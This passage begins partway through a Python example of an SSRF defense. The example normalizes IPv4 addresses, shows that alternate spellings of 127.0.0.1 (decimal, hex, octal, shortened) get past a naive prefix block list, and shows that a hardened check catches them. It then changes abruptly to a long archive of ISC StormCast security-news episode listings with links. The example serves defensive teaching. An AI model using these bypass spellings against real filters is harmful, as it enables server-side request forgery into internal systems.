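    raise ValueError(f"bad IPv4 component: {s!r}")


# inet_aton accepts 1 to 4 components; the last one fills the remaining bits:
#   a -> 32 bits      a.b -> 8 + 24      a.b.c -> 8 + 8 + 16      a.b.c.d -> 8 each
_WIDTHS = {1: (32,), 2: (8, 24), 3: (8, 8, 16), 4: (8, 8, 8, 8)}


def normalize_ipv4(text: str) -> str:
    """Return the canonical dotted quad for any inet_aton-style spelling, else raise ValueError."""
    parts = text.strip().split(".")
    if len(parts) not in _WIDTHS:
        raise ValueError(f"bad IPv4 address: {text!r}")
    value = 0
    for part, width in zip(parts, _WIDTHS[len(parts)]):
        n = _component(part)
        if n >= (1 << width):
            raise ValueError(f"component {part!r} too large for {width} bits")
        value = (value << width) | n
    return str(ipaddress.IPv4Address(value))


def naive_is_internal(host: str) -> bool:
    """The weak form: a string-prefix block list that only recognizes the canonical spelling."""
    return host.startswith(("127.", "10.", "192.168.", "169.254."))


def hardened_is_internal(host: str) -> bool:
    """Normalize first, then ask the address object.

    Input that is not an IPv4 literal is treated as internal (fail closed); a real
    SSRF defense would resolve host names and check every resolved address instead.
    """
    try:
        ip = ipaddress.IPv4Address(normalize_ipv4(host))
    except ValueError:
        return True
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_unspecified or ip.is_reserved)


if __name__ == "__main__":
    for spelling in ("127.0.0.1", "2130706433", "0x7f000001", "0177.0.0.1", "127.1", "0x7f.1"):
        print(f"{spelling:>12} -> {normalize_ipv4(spelling)}  "
              f"naive={naive_is_internal(spelling)}  hardened={hardened_is_internal(spelling)}")
```

Every spelling in the loop is 127.0.0.1 to an inet_aton-based client, and only the first one is caught by the prefix filter; the hardened check blocks all six. Note that Python's own ipaddress module deliberately rejects these alternate spellings, which is why the normalization step is written out rather than delegated to it.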

ISC StormCast for Monday, November 7th, 2022

Remcos Downloader With Unicode Obfuscation https://isc.sans.edu/diary/Remcos%20Downloader%20with%20Unicode%20Obfuscation/29220
Windows Malware With VHD Extension https://isc.sans.edu/diary/Windows%20Malware%20with%20VHD%20Extension/29222
PyPI Packages Attempting to Deliver w4sp Stealer https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack
11/7/2022, 5 minutes, 34 seconds

ISC StormCast for Friday, November 4th, 2022

Breakpoints in Burp https://isc.sans.edu/forums/diary/Breakpoints%20in%20Burp/29214/
TA569 Supply Chain Attack Injects JavaScript https://twitter.com/threatinsight/status/1587865920130752515 https://www.darkreading.com/application-security/supply-chain-attack-pushes-out-malware-to-more-than-250-media-websites
Link to an older story similar to the above JavaScript injection https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/
Hitachi Infrastructure Analytics Advisor https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2022-134/index.html
Fortinet Patches https://fortiguard.fortinet.com/psirt?date=11-2022
Nessus Patches https://www.tenable.com/security/tns-2022-24
11/4/2022, 6 minutes, 57 seconds

ISC StormCast for Thursday, November 3rd, 2022

Who Put the "Dark" in DarkVNC? https://isc.sans.edu/forums/diary/Who+put+the+Dark+in+DarkVNC/29210
sigstore General Availability https://openssf.org/press-release/2022/10/25/sigstore-announces-general-availability-at-sigstorecon/ https://github.blog/2022-10-25-why-were-excited-about-the-sigstore-general-availability/
URLScan.io's SOAR Spot: Chatty Security Tools Leaking Private Data https://positive.security/blog/urlscan-data-leaks
Checkmk: Remote Code Execution by Chaining Multiple Bugs https://blog.sonarsource.com/checkmk-rce-chain-1/
11/3/2022, 6 minutes, 12 seconds

ISC StormCast for Wednesday, November 2nd, 2022

OpenSSL 3.0 Punycode Vulnerability Fix (CVE-2022-3786, CVE-2022-3602) https://isc.sans.edu/forums/diary/Critical+OpenSSL+30+Update+Released+Patches+CVE20223786+CVE20223602/29208 https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/
11/2/2022, 8 minutes, 6 seconds

ISC StormCast for Tuesday, November 1st, 2022

NMAP without NMAP - Port Testing and Scanning with PowerShell https://isc.sans.edu/diary/NMAP+without+NMAP+Port+Testing+and+Scanning+with+PowerShell/29202
ConnectWise Recover and R1Soft Server Backup Critical Vulnerability https://www.connectwise.com/company/trust/security-bulletins/r1soft-and-recover-security-bulletin
Google Chrome 0-Day Patch https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html
LODEINFO 2022 Abusing Security Software https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/
Spring Security Vulnerability https://tanzu.vmware.com/security/cve-2022-31692
11/1/2022, 6 minutes, 25 seconds

ISC StormCast for Monday, October 31st, 2022

Supersizing your DUO and 365 Integration https://isc.sans.edu/forums/diary/Supersizing%20your%20DUO%20and%20365%20Integration/29194/
TCP/IP Vulnerability CVE-2022-34718 PoC Restoration and Analysis https://medium.com/numen-cyber-labs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf
Juniper SSLVPN / JunOS RCE Vulnerabilities https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
Raspberry Robin Update https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
10/31/2022, 5 minutes, 57 seconds

ISC StormCast for Friday, October 28th, 2022

Upcoming Critical OpenSSL Vulnerability: What will be Affected? https://isc.sans.edu/forums/diary/Upcoming+Critical+OpenSSL+Vulnerability+What+will+be+Affected/29192
Apple Updates https://support.apple.com/en-us/HT201222
Fodcha Botnet Reaches 1Tbps https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/ https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/
10/28/2022, 5 minutes, 57 seconds

ISC StormCast for Thursday, October 27th, 2022

Why is My Cat Using Baidu And Other IoT DNS Oddities https://isc.sans.edu/forums/diary/Why+is+My+Cat+Using+Baidu+And+Other+IoT+DNS+Oddities/29188
OpenSSL Critical Flaw to Be Patched https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html
macOS Ventura Blocks Security Tools https://www.wired.com/story/apple-macos-ventura-bug-security-tools/
Critical VMware Advisory VMSA-2022-0027 https://www.vmware.com/security/advisories/VMSA-2022-0027.html
10/27/2022, 6 minutes, 12 seconds

ISC StormCast for Wednesday, October 26th, 2022

Massive Cryptomining Operation via GitHub Actions https://sysdig.com/blog/massive-cryptomining-operation-github-actions/
Daixin Team Ransomware Targeting Healthcare Providers https://www.ic3.gov/Media/News/2022/221021.pdf
Cisco AnyConnect Client Exploited in the Wild https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj
SQLite Vulnerability Details https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/
10/26/2022, 5 minutes, 53 seconds

ISC StormCast for Tuesday, October 25th, 2022

C2 Communications Through Outlook.com https://isc.sans.edu/forums/diary/C2+Communications+Through+outlookcom/29180
Apple Patches Everything: October 2022 Edition https://isc.sans.edu/forums/diary/Apple%20Patches%20Everything%3A%20October%202022%20Edition/29182/
Cisco ISE Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-path-trav-Dz5dpzyM
Dormant Colors: Live Campaign With Over 1M Data-Stealing Extensions Installed https://guardiosecurity.medium.com/dormant-colors-live-campaign-with-over-1m-data-stealing-extensions-installed-9a9a459b5849
10/25/2022, 6 minutes, 20 seconds

ISC StormCast for Monday, October 24th, 2022

sczriptzzbn Inject Pushes Malware for NetSupport RAT https://isc.sans.edu/forums/diary/sczriptzzbn%20inject%20pushes%20malware%20for%20NetSupport%20RAT/29170/
rtfdump's Find Option https://isc.sans.edu/forums/diary/rtfdumps+Find+Option/29174
Exploited Windows Zero-Day Lets JavaScript Files Bypass Security Warnings https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/
A Study of Malicious CVE Proof-of-Concept Exploits on GitHub https://arxiv.org/pdf/2210.08374.pdf
F5 Patches https://support.f5.com/csp/article/K11830089 https://support.f5.com/csp/article/K30425568
Synology Updates https://www.synology.com/en-global/security/advisory/Synology_SA_22_17
10/24/2022, 6 minutes, 47 seconds

ISC StormCast for Friday, October 21st, 2022

Forensic Value of Prefetch https://isc.sans.edu/forums/diary/Forensic%20Value%20of%20Prefetch/29168/
Microsoft TLS Fix https://support.microsoft.com/en-us/topic/october-17-2022-kb5020435-os-builds-19042-2132-19043-2132-and-19044-2132-out-of-band-243f34de-2f44-4015-a224-1b68a4132ca5
CISA Releases ScubaGear to Audit M365 https://github.com/cisagov/ScubaGear
HTTP/3 Connection Contamination https://portswigger.net/research/http-3-connection-contamination
10/21/2022, 5 minutes, 54 seconds

ISC StormCast for Thursday, October 20th, 2022

Are Internet Scanning Services Good or Bad for You? https://isc.sans.edu/forums/diary/Are+Internet+Scanning+Services+Good+or+Bad+for+You/29164
FBI Warns of Student Loan Forgiveness Scams https://www.ic3.gov/Media/Y2022/PSA221018
Fully Undetectable PowerShell Backdoor https://www.safebreach.com/resources/blog/safebreach-labs-researchers-uncover-new-fully-undetectable-powershell-backdoor/
10/20/2022, 6 minutes, 6 seconds

ISC StormCast for Wednesday, October 19th, 2022

Python Obfuscation for Dummies https://isc.sans.edu/forums/diary/Python%20Obfuscation%20for%20Dummies/29160/
Oracle October 2022 Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2022.html
Weak Encryption in Microsoft Office 365 https://labs.withsecure.com/advisories/microsoft-office-365-message-encryption-insecure-mode-of-operation
Tesla 3 Hack https://www.synacktiv.com/sites/default/files/2022-10/tesla_hexacon.pdf
10/19/2022, 5 minutes, 27 seconds

ISC StormCast for Tuesday, October 18th, 2022

Fileless PowerShell Dropper https://isc.sans.edu/forums/diary/Fileless%20Powershell%20Dropper/29156/
Apache Commons Text Vulnerability https://www.openwall.com/lists/oss-security/2022/10/13/4
How a Microsoft Blunder Opened Millions of PCs to Potent Malware Attacks https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/
10/18/2022, 6 minutes, 24 seconds

ISC StormCast for Monday, October 17th, 2022

Horizon3 Publishes FortiOS Vulnerability Details and Exploit https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/
More Exchange Vulnerability Workaround Bypasses https://twitter.com/wdormann/status/1576922677675102208
Analysis of a Malicious HTML File and QBot https://isc.sans.edu/forums/diary/Analysis+of+a+Malicious+HTML+File+QBot/29146
End of Life VMware ESXi Versions https://www.lansweeper.com/eol/vmware-esxi-end-of-life/
10/17/2022, 5 minutes, 58 seconds

ISC StormCast for Friday, October 14th, 2022

Alchimist Offensive Framework https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html#more
VM2 Sandbox Vulnerability https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067
Private npm Package Disclosure https://blog.aquasec.com/private-packages-disclosed-via-timing-attack-on-npm
Zimbra Updates https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27#Security_Fixes
10/14/2022, 5 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, October 13th, 2022

Adobe October Patch Tuesday https://helpx.adobe.com/sa_en/security/security-bulletin.html Fortinet Guidance https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ https://isc.sans.edu/forums/diary/Scans+for+old+Fortigate+Vulnerability+Building+Target+Lists/29142 Android VPN Issues https://mullvad.net/en/blog/2022/10/10/android-leaks-connectivity-check-traffic/ iOS VPN Issues https://9to5mac.com/2022/10/12/ios-vpn-apps-2/ Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-015.txt
10/13/2022, 5 minutes, 3 seconds

ISC StormCast for Wednesday, October 12th, 2022

Microsoft October 2022 Patches https://isc.sans.edu/forums/diary/October%202022%20Microsoft%20Patch%20Tuesday/29138/ SAP Patchday https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10 Top CVEs Actively Exploited By People's Republic of China State-Sponsored Cyber Actors https://www.cisa.gov/uscert/ncas/alerts/aa22-279a
10/12/2022, 5 minutes, 56 seconds

ISC StormCast for Tuesday, October 11th, 2022

Wireshark Display Filter Update https://isc.sans.edu/forums/diary/Wireshark+Specifying+a+Protocol+Stack+Layer+in+Display+Filters/29130 Fortinet Vulnerability Update https://twitter.com/Horizon3Attack/status/1579285863108087810 BazarCall Social Engineering Tactics https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html RPKI Rate Limiting https://www.usenix.org/system/files/sec22-hlavacek.pdf
10/11/2022, 6 minutes, 15 seconds

ISC StormCast for Monday, October 10th, 2022

Fortinet Update https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/760203/introduction-and-supported-models Zimbra Vulnerability https://twitter.com/iagox86/status/1578084484720734209 https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis?referrer=activityFeed Microsoft Exchange Workaround Improved Again https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ Ikea Smart Bulb Exploit https://www.synopsys.com/blogs/software-security/cyrc-advisory-ikea-tradfri-smart-lighting/
10/10/2022, 6 minutes, 22 seconds

ISC StormCast for Friday, October 7th, 2022

Infosec Calendar https://isc.sans.edu/forums/diary/What+is+in+your+Infosec+Calendar/29118 OnionPoison: infected Tor Browser installer distributed through popular YouTube channel https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/ MacOS Archive Utility Vulnerability Details https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/
10/7/2022, 5 minutes, 55 seconds

ISC StormCast for Wednesday, October 5th, 2022

Credential Harvesting with Telegram https://isc.sans.edu/forums/diary/Credential%20Harvesting%20with%20Telegram%20API/29112/ Updated Microsoft Exchange Fix https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization https://www.cisa.gov/uscert/ncas/alerts/aa22-277a A New Supply Chain Attack on PHP https://blog.sonarsource.com/securing-developer-tools-a-new-supply-chain-attack-on-php/
10/5/2022, 5 minutes, 21 seconds

ISC StormCast for Tuesday, October 4th, 2022

Microsoft Exchange Vulnerability Fix Bypassed https://twitter.com/testanull/status/1576774007826718720 Schneider Electric UMAS Patch Bypass https://securelist.com/the-secrets-of-schneider-electrics-umas-protocol/107435/ Supply Chain Attack via Trojanized Comm100 Chat Installer https://www.crowdstrike.com/blog/new-supply-chain-attack-leverages-comm100-chat-installer/
10/4/2022, 5 minutes, 1 second

ISC StormCast for Monday, October 3rd, 2022

Microsoft Exchange 0-Day Update https://isc.sans.edu/forums/diary/Exchange+Server+0Day+Actively+Exploited/29106 https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/ CISA Adds Atlassian Bitbucket Vulnerability to Exploited List https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog Every unsandboxed app has Full Disk Access if Terminal Does https://lapcatsoftware.com/articles/FullDiskAccess.html
10/3/2022, 5 minutes, 18 seconds

ISC StormCast for Friday, September 30th, 2022

PNG Analysis with pngdump.py https://isc.sans.edu/forums/diary/PNG%20Analysis/29100/ Possible Exchange Server 0-Day Vulnerability https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html https://success.trendmicro.com/dcx/s/solution/000291651?language=en_US Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence
9/30/2022, 6 minutes, 3 seconds

ISC StormCast for Thursday, September 29th, 2022

10 Years Later: Attacker re-discovering old VTiger CRM Vulnerability https://isc.sans.edu/forums/diary/10+Years+Later+Attacker+rediscovering+old+VTiger+CRM+Vulnerability/29098 IRS Reports Significant Increase in Texting Scams https://www.irs.gov/newsroom/irs-reports-significant-increase-in-texting-scams-warns-taxpayers-to-remain-vigilant Cloudflare Releases Turnstile, a user-friendly, privacy-preserving CAPTCHA alternative https://blog.cloudflare.com/turnstile-private-captcha-alternative/ Cisco Patches https://kb.cert.org/vuls/id/855201 Chrome 106 Release https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop_27.html?m=1
9/29/2022, 6 minutes, 35 seconds

ISC StormCast for Wednesday, September 28th, 2022

DNS Option 15 and Debugging DNSSEC Errors https://isc.sans.edu/forums/diary/DNS+Option+15+Debugging+DNSSEC+Errors/29094 Yari: A New Era of Yara Debugging https://engineering.avast.io/yari-a-new-era-of-yara-debugging/ HTTP Archive Almanac https://almanac.httparchive.org/en/2022/security
9/28/2022, 7 minutes, 6 seconds

ISC StormCast for Tuesday, September 27th, 2022

Easy Python Sandbox Detection https://isc.sans.edu/forums/diary/Easy+Python+Sandbox+Detection/29090 Hackers use PowerPoint Files for "Mouseover" Malware Delivery https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/ Redis 7.0 XAUTOCLAIM Heap Overflow https://github.com/redis/redis/security/advisories/GHSA-5gc4-76rx-22c9 Scoreboard Hacking https://maxwelldulin.com/BlogPost?post=7118102528
9/27/2022, 5 minutes, 56 seconds

ISC StormCast for Monday, September 26th, 2022

Kids Like Cookies and Malware Likes them Too https://isc.sans.edu/forums/diary/Kids+Like+Cookies+Malware+Too/29082 Downloading Files from Removed Domains https://isc.sans.edu/forums/diary/Downloading%20Samples%20From%20Takendown%20Domains/29086/ WhatsApp Security Updates https://www.whatsapp.com/security/advisories/2022/ Sophos RCE Flaw https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce CircleCI Phishing Attacks Used to Access GitHub Accounts https://discuss.circleci.com/t/circleci-security-alert-warning-phishing-attempt-for-login-credentials/45408
9/26/2022, 5 minutes, 46 seconds

ISC StormCast for Friday, September 23rd, 2022

RAT Delivered Through FODHelper https://isc.sans.edu/forums/diary/RAT+Delivered+Through+FODHelper/29078 Microsoft Endpoint Configuration Manager Spoofing Vulnerability https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972 New Fuzzing Tool: cifuzz https://github.com/CodeIntelligenceTesting/cifuzz No Security Updates from Apple https://support.apple.com/en-us/HT201222
9/23/2022, 5 minutes, 21 seconds

ISC StormCast for Thursday, September 22nd, 2022

Phishing Campaigns Use Free Online Resources https://isc.sans.edu/forums/diary/Phishing%20Campaigns%20Use%20Free%20Online%20Resources/29074/ Insecure use of tarfile.extract in Python https://bugs.python.org/issue1044#msg55464 Twitter Failed to Logout Users After Password Reset https://privacy.twitter.com/en/blog/2022/an-issue-impacting-password-resets
9/22/2022, 6 minutes, 48 seconds

ISC StormCast for Wednesday, September 21st, 2022

Chainsaw: Hunt, search and extract event log records https://isc.sans.edu/diary/Chainsaw%3A+Hunt%2C+search%2C+and+extract+event+log+records/29066 PDU Exploits past NAT https://claroty.com/team82/research/jumping-nat-to-shut-down-electric-devices Tamper Protection will be turned on for all Enterprise Customers https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/tamper-protection-will-be-turned-on-for-all-enterprise-customers/ba-p/3616478
9/21/2022, 6 minutes, 28 seconds

ISC StormCast for Tuesday, September 20th, 2022

Preventing ISO Malware https://isc.sans.edu/diary/Preventing+ISO+Malware+/29062 State of Emotet https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 Undermining Microsoft Teams Security by Mining Tokens https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
9/20/2022, 6 minutes, 28 seconds

ISC StormCast for Monday, September 19th, 2022

Word Maldoc With CustomXML and Renamed VBAProject.bin https://isc.sans.edu/diary/Word+Maldoc+With+CustomXML+and+Renamed+VBAProject.bin/29056 2FA on Lock Screens https://www.bbc.com/news/uk-england-london-62809151 Chrome and Edge Enhanced Spellcheck Features Expose PII, Even Your Passwords https://www.otto-js.com/news/article/chrome-and-edge-enhanced-spellcheck-features-expose-pii-even-your-passwords Reconstructing Content Reflected in Glasses https://arxiv.org/abs/2205.03971
9/19/2022, 5 minutes, 56 seconds

ISC StormCast for Friday, September 16th, 2022

Malicious Word Document With a Frameset https://isc.sans.edu/diary/Malicious+Word+Document+with+a+Frameset/29052 CVE-2022-34721 Exploit https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721 Trojaned Putty Used in Attacks https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing Lenovo BIOS Updates https://support.lenovo.com/us/en/product_security/LEN-94953#Desktop
9/16/2022, 6 minutes, 44 seconds

ISC StormCast for Thursday, September 15th, 2022

Easy Process Injection within Python https://isc.sans.edu/diary/Easy+Process+Injection+within+Python/29048 Queen Elizabeth Related Phishing https://twitter.com/threatinsight/status/1570092339984584705 Microsoft 365 Auto Updates Apps on Locked or Idle Devices https://techcommunity.microsoft.com/t5/microsoft-365-blog/update-under-lock-improved-update-experience-for-microsoft-365/ba-p/3618901
9/15/2022, 5 minutes, 34 seconds

ISC StormCast for Wednesday, September 14th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2022+Patch+Tuesday/29044/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Magento Vendor Fishpig Hacked, Backdoors Added https://sansec.io/research/rekoobe-fishpig-magento
9/14/2022, 6 minutes, 23 seconds

ISC StormCast for Tuesday, September 13th, 2022

VirusTotal Result Comparisons for Honeypot Malware https://isc.sans.edu/diary/VirusTotal+Result+Comparisons+for+Honeypot+Malware/29040 Apple Patches https://support.apple.com/en-us/HT201222 Lorenz Ransomware Group Cracks MiVoice and Calls Back For Free https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
9/13/2022, 7 minutes, 41 seconds

ISC StormCast for Monday, September 12th, 2022

Malware Abusing File Exchange Site https://isc.sans.edu/diary/Phishing+Word+Documents+with+Suspicious+URL/29034 Bypassing GitHub Required Reviewers to Submit Malicious Code https://www.legitsecurity.com/blog/bypassing-github-required-reviewers-to-submit-malicious-code Crimeware Trends: Ransomware Developers Turn to Intermittent Encryption https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/ Let's Encrypt Reviving Certificate Revocation Lists https://letsencrypt.org/2022/09/07/new-life-for-crls.html
9/12/2022, 8 minutes, 31 seconds

ISC StormCast for Friday, September 9th, 2022

Analyzing Obfuscated VBS with CyberChef https://isc.sans.edu/diary/Analyzing+Obfuscated+VBS+with+CyberChef/2902 pfBlockerNG Unauthenticated RCE https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ GifShell attack creates reverse shell using microsoft teams gifs https://www.bleepingcomputer.com/news/security/gifshell-attack-creates-reverse-shell-using-microsoft-teams-gifs/
9/9/2022, 7 minutes, 3 seconds

ISC StormCast for Thursday, September 8th, 2022

PHP Deserialization Exploit Attempt https://isc.sans.edu/diary/PHP+Deserialization+Exploit+attempt/29024 TA505 Group's TeslaGun In-Depth Analysis https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis Cisco publishes unpatched Small Business Router Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-vpnbypass-Cpheup9O Shikitega - New stealthy malware targeting Linux https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html
9/8/2022, 5 minutes, 52 seconds

ISC StormCast for Wednesday, September 7th, 2022

Analysis of an Encoded Cobalt Strike Beacon https://isc.sans.edu/diary/Analysis+of+an+Encoded+Cobalt+Strike+Beacon/29014 EvilProxy Phishing-As-A-Service with MFA Bypass https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web Zyxel Patches RCE Vulnerability https://www.zyxel.com/support/Zyxel-security-advisory-for-format-string-vulnerability-in-NAS.shtml Moobot Going after D-Link Devices https://unit42.paloaltonetworks.com/moobot-d-link-devices/
9/7/2022, 6 minutes, 18 seconds

ISC StormCast for Tuesday, September 6th, 2022

James Webb JPEG With Malware https://isc.sans.edu/diary/James+Webb+JPEG+With+Malware/29010 Windows Defender False Positive https://www.theregister.com/2022/09/05/windows_defender_chrome_false_positive/ Google Chrome 0-Day https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html Sharkbot Android Infostealer in Google Play Store https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/ Nmap 7.93 - 25th Anniversary Release https://seclists.org/nmap-announce/2022/1
9/6/2022, 5 minutes, 46 seconds

ISC StormCast for Friday, September 2nd, 2022

Jolokia Scans: Possible Hunt for Vulnerable Apache Geode Servers https://isc.sans.edu/diary/Jolokia+Scans%3A+Possible+Hunt+for+Vulnerable+Apache+Geode+Servers+%28CVE-2022-37021%29/29006 Microsoft Basic Authentication Deprecation in Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-deprecation-in-exchange-online-september/ba-p/3609437 Mobile App Supply Chain Vulnerabilities Could Endanger Sensitive Business Information https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mobile-supply-chain-aws Gitlab Update https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#brute-force-attack-may-guess-a-password-even-when-2fa-is-enabled
9/2/2022, 6 minutes, 32 seconds

ISC StormCast for Thursday, September 1st, 2022

Underscores and DNS: The Privacy Story https://isc.sans.edu/diary/Underscores+and+DNS%3A+The+Privacy+Story/29002 iOS 12.5.6 Update https://support.apple.com/en-us/HT201222 Malware Disguised as Google Translate Desktop App https://research.checkpoint.com/2022/check-point-research-detects-crypto-miner-malware-disguised-as-google-translate-desktop-and-other-legitimate-applications/ Apache Geode Deserialization Flaw https://lists.apache.org/thread/qrvhmytsshsk5xcb68pwccw3y6m8o8nr Foxit PDF Reader Update https://sec-consult.com/vulnerability-lab/advisory/outdated-javascript-engine-leads-to-rce-in-foxit-pdf-reader/
9/1/2022, 5 minutes, 37 seconds

ISC StormCast for Wednesday, August 31st, 2022

Two things that will never die: bash scripts and IRC https://isc.sans.edu/diary/Two+things+that+will+never+die%3A+bash+scripts+and+IRC%21/28998
Malware using James Webb Telescope images https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/
Malicious Chrome Extensions https://www.mcafee.com/blogs/other-blogs/mcafee-labs/malicious-cookie-stuffing-chrome-extensions-with-1-4-million-users/
Chromium Based Browsers Allow Access to Clipboard https://bugs.chromium.org/p/chromium/issues/detail?id=1334203
8/31/2022, 6 minutes, 40 seconds

ISC StormCast for Tuesday, August 30th, 2022

Update: VBA Maldoc & UTF7 (APT-C-35) https://isc.sans.edu/diary/Update%3A+VBA+Maldoc+%26+UTF7+%28APT-C-35%29/28994
Twilio Breach used to access 2FA Tokens https://sec.okta.com/scatterswine
Popular PDF Reader Adware https://www.malwarebytes.com/blog/news/2022/08/adware-found-on-google-play-pdf-reader-servicing-up-full-screen-ads
Google changing its VPN Ad Blocker Policy https://support.google.com/googleplay/android-developer/answer/12253906?hl=en
8/30/2022, 6 minutes, 9 seconds

ISC StormCast for Monday, August 29th, 2022

Dealing With False Positives when Scanning Memory Dumps for Cobalt Strike Beacons https://isc.sans.edu/diary/Dealing+With+False+Positives+when+Scanning+Memory+Dumps+for+Cobalt+Strike+Beacons/28990
HTTP2 Packet Analysis with Wireshark https://isc.sans.edu/diary/HTTP2+Packet+Analysis+with+Wireshark/28986
Paypal Phishing/Coinbase in One Image https://isc.sans.edu/diary/Paypal+PhishingCoinbase+in+One+Image/28984
Sysinternals Updates: Sysmon v14.0 and ZoomIt v6.01 https://isc.sans.edu/diary/Sysinternals+Updates%3A+Sysmon+v14.0+and+ZoomIt+v6.01/28988
eth.link domain at risk https://www.coindesk.com/tech/2022/08/26/web3-domain-name-service-could-lose-its-web-address-because-programmer-who-can-renew-it-sits-in-jail/
8/29/2022, 6 minutes, 27 seconds

ISC StormCast for Friday, August 26th, 2022

Taking Apart URL Shorteners https://isc.sans.edu/diary/Taking+Apart+URL+Shorteners/28980
Python Developers Phished for PyPI Credentials https://twitter.com/pypi/status/1562442188285308929
Group-IB Connects Twilio and Cloudflare Phishing attacks to others https://www.helpnetsecurity.com/2022/08/25/0ktapus-twilio-cloudflare-phishers-targets/
Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
LastPass Security Incident https://blog.lastpass.com/2022/08/notice-of-recent-security-incident/
Bitbucket Vulnerability https://securityonline.info/cve-2022-36804-bitbucket-server-and-data-center-command-injection-vulnerability/
8/26/2022, 6 minutes, 35 seconds

ISC StormCast for Thursday, August 25th, 2022

Monster Libra -> IcedID -> Cobalt Strike and DarkVNC https://isc.sans.edu/forums/diary/VNC/28974/
Is Tox the New C&C Method for Coinminers? https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers
Carbon Black Blue Screens https://community.carbonblack.com/t5/Knowledge-Base/Endpoint-Standard-Sudden-Blue-Screens-on-Windows-Devices-23rd/ta-p/114369
Gitlab Vulnerability https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/#Remote%20Command%20Execution%20via%20Github%20import
